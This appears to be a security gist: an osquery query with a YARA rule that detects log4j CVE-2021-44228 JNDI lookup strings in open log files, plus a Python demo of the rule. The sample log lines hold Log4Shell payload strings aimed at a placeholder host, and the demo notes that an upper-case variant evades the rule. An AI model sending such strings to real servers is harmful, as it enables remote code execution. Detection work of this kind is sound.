@ureddy-uptycs
Last active December 17, 2021 23:02
A SQL query that can be run as a realtime query in osquery to YARA-scan every log file currently opened by a process on the host, looking for indicators of exploitation of the log4j vulnerability CVE-2021-44228 (JNDI lookup strings written into logs).
-- Note: is_container_process (processes) and system_type (process_open_files) are
-- Uptycs osquery columns; upstream osquery does not carry them. Upstream osquery
-- also exposes the inline-rule column of the yara table as "sigrule" rather than "rule".
WITH
procs AS (
    SELECT pid, name, cmdline
    FROM processes
    WHERE is_container_process = 0),
logs AS (
    SELECT DISTINCT o.pid, o.path, p.name, p.cmdline
    FROM process_open_files o
    JOIN procs p USING (pid)
    WHERE o.system_type = 'host'
    AND o.path LIKE '%.log'
    -- skip osquery's own worker log, which would contain this query text
    AND o.path NOT LIKE '%/osqueryd.worker%.log')
SELECT * FROM yara
JOIN logs USING (path)
WHERE count > 0
AND rule = '
rule log4j2JndiLookup {
    meta:
        author = "Uptycs Team"
        description = "Detect indicator of compromise for log4j2 vulnerability CVE-2021-44228 in log files"
        license = "Apache License, Version 2.0"
        version = "0.1"
    strings:
        // Check for ${jndi or ${ctx prefix matches
        $prefix = /\$\{(jndi|ctx)/ ascii wide
        // Look for patterns starting with "${", followed by anything except "}" and ending with "${"
        // (catches nested-lookup obfuscation such as ${${lower:j}ndi:...})
        $nested = /\$\{[^\}\r\n]*\$\{/ ascii wide
    condition:
        any of them
}'
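To see what the two YARA strings actually flag (and what they miss), here is an added example that is not part of the gist: a Python port of the `$prefix` and `$nested` regexes run over a handful of constructed log lines. It only models the `ascii` modifier; the `wide` (UTF-16LE) modifier and osquery's per-file `count` are approximated by a per-file `would_fire` check. A case-insensitive variant is included to show that an upper-case `${JNDI:` prefix slips past the rule as written.

```python
import re

# Python ports of the gist's YARA strings (ASCII only; the YARA "wide" modifier is not modelled).
PREFIX = re.compile(r"\$\{(jndi|ctx)")            # $prefix
NESTED = re.compile(r"\$\{[^}\r\n]*\$\{")          # $nested: "${" ... "${" before any "}"
PREFIX_NOCASE = re.compile(r"\$\{(jndi|ctx)", re.IGNORECASE)  # hypothetical "nocase" variant

# Constructed sample log lines, not real captures.
SAMPLE_LOG_LINES = [
    '10.0.0.5 - - [10/Dec/2021:12:00:01 +0000] "GET / HTTP/1.1" 200 "-" "Mozilla/5.0"',
    '10.0.0.6 - - [10/Dec/2021:12:00:02 +0000] "GET / HTTP/1.1" 200 "-" "${jndi:ldap://example.invalid/a}"',
    '10.0.0.7 - - [10/Dec/2021:12:00:03 +0000] "GET / HTTP/1.1" 200 "-" "${${lower:j}ndi:ldap://example.invalid/a}"',
    '10.0.0.8 - - [10/Dec/2021:12:00:04 +0000] "GET / HTTP/1.1" 200 "-" "${JNDI:ldap://example.invalid/a}"',
    'WARN  session for user ${ctx:loginId} expired',
]


def scan_line(line, nocase=False):
    """Return the names of the rule strings that match this line (YARA semantics: any hit counts)."""
    prefix = PREFIX_NOCASE if nocase else PREFIX
    hits = []
    if prefix.search(line):
        hits.append("$prefix")
    if NESTED.search(line):
        hits.append("$nested")
    return hits


def scan_log(lines, nocase=False):
    """Scan a whole log (list of lines) and return (line index, matched strings) for each hit."""
    results = []
    for idx, line in enumerate(lines):
        hits = scan_line(line, nocase)
        if hits:
            results.append((idx, hits))
    return results


def would_fire(lines, nocase=False):
    """Approximates osquery's 'count > 0' on the yara table: does the rule fire on this file at all?"""
    return len(scan_log(lines, nocase)) > 0


if __name__ == "__main__":
    for idx, hits in scan_log(SAMPLE_LOG_LINES):
        print(f"line {idx}: {hits}")
    print("file flagged:", would_fire(SAMPLE_LOG_LINES))
    print("with nocase, line 3 hits:", scan_line(SAMPLE_LOG_LINES[3], nocase=True))
```

Running it shows the normal request line is clean, the plain `${jndi:` line trips `$prefix`, the `${${lower:j}ndi:` obfuscation is caught only by `$nested`, and the `${JNDI:` line is missed unless the prefix check is made case-insensitive (YARA's `nocase` modifier would do the same in the rule itself). The `${ctx:` hit is a reminder that `$prefix` also matches legitimate log4j2 context lookups, so matches still need triage against the process name and command line the query returns.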